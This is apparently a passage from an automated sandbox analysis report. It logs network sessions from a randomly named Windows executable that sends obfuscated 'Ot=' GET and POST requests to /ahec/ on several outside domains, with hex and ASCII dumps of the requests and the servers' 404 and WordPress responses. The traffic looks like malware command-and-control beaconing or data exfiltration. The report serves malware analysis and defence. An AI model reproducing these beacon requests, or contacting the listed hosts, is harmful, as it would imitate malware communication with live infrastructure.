78 52 56 43 59 73 55 6c 48 43 39 69 59 58 62 4a 41 35 70 56 43 6b 6d 75 34 46 36 6f 4c 37 30 44 51 55 5a 58 6b 73 74 74 51 37 30 30 5a 41 49 6b 49 41 70 36 2f 2f 52 33 5a 79 68 69 45 48 45 70 30 55 4f 49 6e 4e 35 36 78 2f 52 4b 64 62 41 73 50 6a 73 56 57 4a 59 4f 47 6c 38 64 4c 34 50 71 6a 54 30 65 2f 7a 58 32 68 44 34 36 78 51 70 4a 6d 67 76 63 45 46 36 57 38 64 4c 59 59 59 65 56 61 56 4e 42 7a 70 33 4a 55 46 5a 4d 70 4b 75 52 4a 34 2b 39 55 4d 68 6d 4f 67 5a 68 38 50 56 53 44 33 7a 6a 69 70 4f 4a 36 76 51 6d 71 48 30 52 4a 75 4e 37 79 49 72 59 43 49 51 49 78 51 59 56 30 41 44 79 51 68 4f 69 66 44 78 38 77 48 34 32 6f 53 6f 53 70 4c 7a 45 71 78 77 5a 78 2f 42 56 30 36 37 77 52 75 47 7a 58 4a 49 6e 4f 58 61 4f 71 59 53 4f 57 4d 59 4c 35 52 53 34 68 33 79 7a 57 67 52 38 34 53 53 44 34 52 57 55 36 44 6d 79 4b 78 55 72 54 7a 30 67 32 45 31 71 4a 76 68 2b 43 59 62 6d 65 48 30 69 39 31 53 66 69 34 42 72 56 4d 30 6f 6d 71 6c 32 42 46 51 75 33 30 39 61 56 4a 52 45 48 49 77 50 59 6b 78 6f 69 39 35 2b 61 6e 4e 39 74 4f 4c 36 56 56 45 50 65 56 6a 30 73 50 68 61 4b 66 62 53 34 2b 71 35 67 61 68 36 43 42 77 39 54 50 37 62 68 44 52 46 76 57 72 64 4e 58 62 4b 77 65 65 38 36 42 68 37 4b 32 44 4d 6e 50 30 70 65 71 65 4e 6c 67 4c 6e 74 2f 68 70 6c 70 44 52 6c 7a 41 68 38 6c 4f 58 31 6a 71 39 59 42 2b 4a 33 6d 72 41 6c 57 4f 36 4d 6d 55 4c 4f 46 49 77 65 59 76 30 66 69 6c 46 57 51 50 79 34 32 45 38 31 71 69 72 45 45 7a 66 4b 63 6e 64 42 54 47 75 66 71 72 31 70 74 55 63 32 36 32 76 31 37 6b 67 47 41 45 5a 35 32 69 45 42 2b 51 4f 6d 59 78 72 69 6d 49 77 4c 41 56 4c 35 44 32 50 59 62 4c 45 6f 41 64 2b 4b 78 71 49 43 72 44 47 62 2b 4e 73 35 72 70 4a 2f 63 66 54 74 58 55 55 62 69 36 4d 55 33 57 76 44 48 45 54 41 4d 37 66 68 54 31 43 4d 67 2f 4c 73 41 65 34 30 51 48 58 38 4e 65 53 44 4d 6e 63 51 4f 6f 30 4e 4f 53 7a 75 47 73 6e 4c 79 6e 6c 68 74 49 64 46 78 46 4b 6c 58 36 79 69 32 4a 2f 4f 6a 58 76 4d 6a 38 71 65 55 55 46 47 65 6d 47 77 53 45 38 58 58 71 6f 6a 35 63 6e 74 50 6c 48 7a 72 77 31 31 36 47 77 6f 72 73 37 4b 61 6a 34 6c 6b 79 74 70 50 70 44 73 61 42 41 4e 52 4f 68 6e 36 64 68 50 59 50 67 6f 35 70 65 50 4f 70 4b 43 62 41 47 45 36 68 50 43 38 6a 42 6f 43 53 4e 50
                                                                        Data Ascii: Ot=qDdKu90srGSGkuG/Enx/SqTMVu04g1KoThGKcu5Sd8qkLZSrXyJv+6L3VcvVLsVldarELUojmNwS3g9yhcktMICoTumjD0CXmnjZU3wERgbdxoXp8ffpvEntqg2sJ/1Ea0+vmMMfh/BdKbm1KDBTx1UYYCeOT07mPIG5o8jWakFNDC9YsKdOkqlFyVnd4IQDeifgdu001jXzKQV2Pl0FfsQvAOO7XuYjtVo4BA40ZWvIUItgME2isp0jKG2djSS0dwT8EJTQ3xN/wRLt1k4Uz37jKOwyfr5IVPoe5kJzhiuJZhvWJftzn4t+ggGPz3tUX31d10JnUoUXsMlwEse2qiUhINndZkIkaZt6nc40ozFzPMt11b6cvXJKdlGh91LSoEtYUZqG9+xCRrZNucib51DiuznyGYYKxSRWDeORAG5GSb/8j9RpvqgQbjR83peJ6Xp1HojZp5ubuiDMyR9nat/FYLbLNvue2zdxRVCYsUlHC9iYXbJA5pVCkmu4F6oL70DQUZXksttQ700ZAIkIAp6//R3ZyhiEHEp0UOInN56x/RKdbAsPjsVWJYOGl8dL4PqjT0e/zX2hD46xQpJmgvcEF6W8dLYYYeVaVNBzp3JUFZMpKuRJ4+9UMhmOgZh8PVSD3zjipOJ6vQmqH0RJuN7yIrYCIQIxQYV0ADyQhOifDx8wH42oSoSpLzEqxwZx/BV067wRuGzXJInOXaOqYSOWMYL5RS4h3yzWgR84SSD4RWU6DmyKxUrTz0g2E1qJvh+CYbmeH0i91Sfi4BrVM0omql2BFQu309aVJREHIwPYkxoi95+anN9tOL6VVEPeVj0sPhaKfbS4+q5gah6CBw9TP7bhDRFvWrdNXbKwee86Bh7K2DMnP0peqeNlgLnt/hplpDRlzAh8lOX1jq9YB+J3mrAlWO6MmULOFIweYv0filFWQPy42E81qirEEzfKcndBTGufqr1ptUc262v17kgGAEZ52iEB+QOmYxrimIwLAVL5D2PYbLEoAd+KxqICrDGb+Ns5rpJ/cfTtXUUbi6MU3WvDHETAM7fhT1CMg/LsAe40QHX8NeSDMncQOo0NOSzuGsnLynlhtIdFxFKlX6yi2J/OjXvMj8qeUUFGemGwSE8XXqoj5cntPlHzrw116Gwors7Kaj4lkytpPpDsaBANROhn6dhPYPgo5pePOpKCbAGE6hPC8jBoCSNP
                                                                        Dec 2, 2023 18:51:40.952306032 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:51:40 GMT
                                                                        Server: Apache
                                                                        Content-Length: 315
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        40192.168.2.1049752162.241.252.161805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:51:44.660860062 CET518OUTGET /ahec/?Ot=nB1qtJANgieev8TNIXcafe3NbPYBnXyCXRyPWsB/WMzSWoyZdSlu5bXncPzzIIBEZ/2nP35zxbYs3CtalsMWA7WUc9X1BQW9lg==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.thecoloringbitch.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:51:44.861386061 CET533INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:51:44 GMT
                                                                        Server: Apache
                                                                        Content-Length: 315
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        41192.168.2.1049753185.74.252.11805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:51:50.721636057 CET792OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.altralogos.com
                                                                        Origin: http://www.altralogos.com
                                                                        Referer: http://www.altralogos.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 36 6e 41 59 31 70 77 4a 75 72 46 33 6d 5a 56 74 71 68 6f 6a 63 53 2f 70 46 51 4e 64 2b 65 70 6a 5a 5a 77 67 4e 41 36 6c 57 77 45 6d 6d 32 4c 39 4d 44 46 6a 73 4a 33 57 4f 6f 6e 54 6c 41 47 38 51 64 52 4e 53 47 2b 6e 38 30 4f 31 4c 58 69 66 38 77 79 51 51 4b 54 76 4b 4e 57 76 57 58 39 59 61 71 58 4c 6b 37 55 77 6a 4c 62 66 6c 67 6b 39 37 51 36 38 64 35 45 38 4c 6c 33 34 46 46 46 51 68 76 64 49 30 72 4b 5a 76 6c 51 6c 58 4f 5a 4d 37 48 58 36 70 72 35 51 61 71 76 41 61 44 6d 76 37 47 72 61 76 68 46 77 33 4f 33 6c 72 76 47 66 58 51 3d 3d
                                                                        Data Ascii: Ot=6nAY1pwJurF3mZVtqhojcS/pFQNd+epjZZwgNA6lWwEmm2L9MDFjsJ3WOonTlAG8QdRNSG+n80O1LXif8wyQQKTvKNWvWX9YaqXLk7UwjLbflgk97Q68d5E8Ll34FFFQhvdI0rKZvlQlXOZM7HX6pr5QaqvAaDmv7GravhFw3O3lrvGfXQ==
                                                                        Dec 2, 2023 18:51:51.892266989 CET1340INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:51:50 GMT
                                                                        Server: Apache
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade, close
                                                                        Transfer-Encoding: chunked
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4d 53 49 6e 70 75 74 4d 65 74 68 6f 64 43 6f 6e 74 65 78 74 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 6a 73 2f 6c 69 62 73 2f 69 65 31 31 43 75 73 74 6f 6d 50 72 6f 70 65 72 74 69 65 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 5c 2f 73 63 72 69 70 74 3e 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 50 72 65 6d 69 75 6d 20 70 6c 75 67 69 6e 20 76 31 39 2e 32 2e 31 20 28 59 6f 61 73 74 20 53 45 4f 20 76 31 39 2e 36 2e 31 29 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 75 5f 52 55 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22
                                                                        Data Ascii: 4000<!DOCTYPE html><html lang="ru-RU"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="http://altralogos.com/xmlrpc.php"><script>window.MSInputMethodContext && document.documentMode && document.write('<script src="http://altralogos.com/wp-content/themes/woodmart/js/libs/ie11CustomProperties.min.js"><\/script>');</script><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO Premium plugin v19.2.1 (Yoast SEO v19.6.1) - https://yoast.com/wordpress/plugins/seo/ --><title> | Altralogos</title><meta property="og:locale" content="ru_RU" /><meta property="og:title" content=" | Altralogos" /><meta property="og:site_name" content="Altralogos" /><script type="application/ld+json" class="yoast-schema-graph">{"
                                                                        Dec 2, 2023 18:51:51.892296076 CET1340INData Raw: 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 74 72 61 6c 6f
                                                                        Data Ascii: @context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://altralogos.com/#website","url":"https://altralogos.com/","name":"Altralogos","description":"Altralogos","potentialAction":[{"@type":"SearchAction","target":{"@type":"En
                                                                        Dec 2, 2023 18:51:51.892307043 CET1340INData Raw: 2e 31 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 32 33 37 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a
                                                                        Data Ascii: .125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><link rel='stylesheet' id='elementor-icons-css' href='http://altralogos.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?v
                                                                        Dec 2, 2023 18:51:51.892316103 CET1340INData Raw: 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 64 2d 62 61 73 65 2d 64 65 70 72 65 63 61 74 65 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 6c
                                                                        Data Ascii: media='all' /><link rel='stylesheet' id='wd-base-deprecated-css' href='http://altralogos.com/wp-content/themes/woodmart/css/parts/base-deprecated.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-elementor-base-
                                                                        Dec 2, 2023 18:51:51.892493963 CET1340INData Raw: 27 20 69 64 3d 27 77 64 2d 70 61 67 65 2d 74 69 74 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73
                                                                        Data Ascii: ' id='wd-page-title-css' href='http://altralogos.com/wp-content/themes/woodmart/css/parts/page-title.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-wd-search-form-css' href='http://altralogos.com/wp-content/the
                                                                        Dec 2, 2023 18:51:51.892513037 CET1340INData Raw: 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73 73 2f 70 61 72 74 73 2f 6f 70 74 2d 73 63 72 6f 6c 6c 74 6f 74 6f 70 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 35 2e 34 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63
                                                                        Data Ascii: -content/themes/woodmart/css/parts/opt-scrolltotop.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='xts-google-fonts-css' href='https://fonts.googleapis.com/css?family=Inter%3A400%2C600%2C300%7CPlayfair+Display%3A40
                                                                        Dec 2, 2023 18:51:51.892524958 CET1340INData Raw: 49 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 64 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 52 53 44 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 3f
                                                                        Data Ascii: I" type="application/rsd+xml" title="RSD" href="https://altralogos.com/xmlrpc.php?rsd" /><meta name="generator" content="WordPress 6.4.1" /><meta name="theme-color" content="rgb(1,34,31)"><meta name="viewport" content="width=device-widt
                                                                        Dec 2, 2023 18:51:51.892538071 CET1340INData Raw: 70 3a 20 2d 30 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2d 30 70 78 3b 0a 09 68 65 69 67 68 74 3a 20 63 61 6c 63 28 31 30 30 25 20 2b 20 30 70 78 29 3b 0a 7d 0a 0a 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31
                                                                        Data Ascii: p: -0px;margin-bottom: -0px;height: calc(100% + 0px);}@media (min-width: 1025px) {.whb-top-bar-inner {height: 80px;max-height: 80px;}.whb-sticked .whb-top-bar-inner {height: 40px;max-height: 40px;}.whb-he
                                                                        Dec 2, 2023 18:51:51.892549992 CET1340INData Raw: 6c 61 79 22 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 2d 2d 77 64 2d 74 69 74 6c 65 2d 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 0a 2d 2d 77 64 2d 74 69 74 6c 65 2d 63 6f 6c 6f 72 3a 23
                                                                        Data Ascii: lay", Arial, Helvetica, sans-serif;--wd-title-font-weight:600;--wd-title-color:#242424;}:root{--wd-entities-title-font:"Playfair Display", Arial, Helvetica, sans-serif;--wd-entities-title-font-weight:700;--wd-entities-title-color:#33333
                                                                        Dec 2, 2023 18:51:51.892565966 CET1340INData Raw: 74 7b 0a 2d 2d 6e 6f 74 69 63 65 73 2d 73 75 63 63 65 73 73 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0a 7d 0a 3a 72 6f 6f 74 7b 0a 2d 2d 6e 6f 74 69 63 65 73 2d 77 61 72 6e 69 6e 67 2d 62 67 3a 72 67 62 28 32 32 35 2c 31 31 33 2c 36 35 29 3b 0a 7d 0a
                                                                        Data Ascii: t{--notices-success-color:#fff;}:root{--notices-warning-bg:rgb(225,113,65);}:root{--notices-warning-color:#fff;}:root{--wd-form-brd-radius: 35px;--wd-form-brd-width: 2px;--btn-default-color: #ff
                                                                        Dec 2, 2023 18:51:52.077836037 CET1340INData Raw: 6e 2e 77 64 2d 73 65 63 74 69 6f 6e 2d 73 74 72 65 74 63 68 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6c 75 6d 6e 2d 67 61 70 2d 64 65 66 61 75 6c 74 20 7b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 31 32 70 78 3b 0a 09 09 7d 0a 09
                                                                        Data Ascii: n.wd-section-stretch > .elementor-column-gap-default {max-width: 1212px;}.elementor-section.wd-section-stretch > .elementor-column-gap-extended {max-width: 1222px;}.elementor-section.wd-section-stretch > .elementor-column-g


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        42192.168.2.1049754185.74.252.11805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:51:53.427474022 CET812OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.altralogos.com
                                                                        Origin: http://www.altralogos.com
                                                                        Referer: http://www.altralogos.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 36 6e 41 59 31 70 77 4a 75 72 46 33 6c 34 6c 74 73 47 30 6a 65 79 2f 32 5a 41 4e 64 6e 75 70 76 5a 5a 38 67 4e 43 57 31 57 44 67 6d 6d 54 76 39 4e 47 6c 6a 72 4a 33 57 47 49 6e 73 34 51 48 77 51 64 74 2f 53 45 71 6e 38 30 79 31 4c 57 53 66 39 42 79 50 54 36 54 70 41 64 57 74 4a 6e 39 59 61 71 58 4c 6b 37 70 62 6a 4c 44 66 6c 78 55 39 70 46 47 2f 62 4a 45 2f 43 46 33 34 55 56 46 4d 68 76 64 6d 30 71 58 32 76 6d 34 6c 58 50 70 4d 37 54 37 39 6a 72 34 62 48 61 76 4f 53 68 6a 37 2f 6b 37 34 73 43 46 71 6b 4f 47 5a 6a 61 71 4d 51 67 44 45 67 5a 44 2b 64 78 73 6a 49 38 44 43 4d 34 51 5a 42 72 41 3d
                                                                        Data Ascii: Ot=6nAY1pwJurF3l4ltsG0jey/2ZANdnupvZZ8gNCW1WDgmmTv9NGljrJ3WGIns4QHwQdt/SEqn80y1LWSf9ByPT6TpAdWtJn9YaqXLk7pbjLDflxU9pFG/bJE/CF34UVFMhvdm0qX2vm4lXPpM7T79jr4bHavOShj7/k74sCFqkOGZjaqMQgDEgZD+dxsjI8DCM4QZBrA=
                                                                        Dec 2, 2023 18:51:54.575953007 CET1340INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 02 Dec 2023 17:51:52 GMT
                                                                        Server: Apache
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade, close
                                                                        Transfer-Encoding: chunked
                                                                        Content-Type: text/html; charset=UTF-8
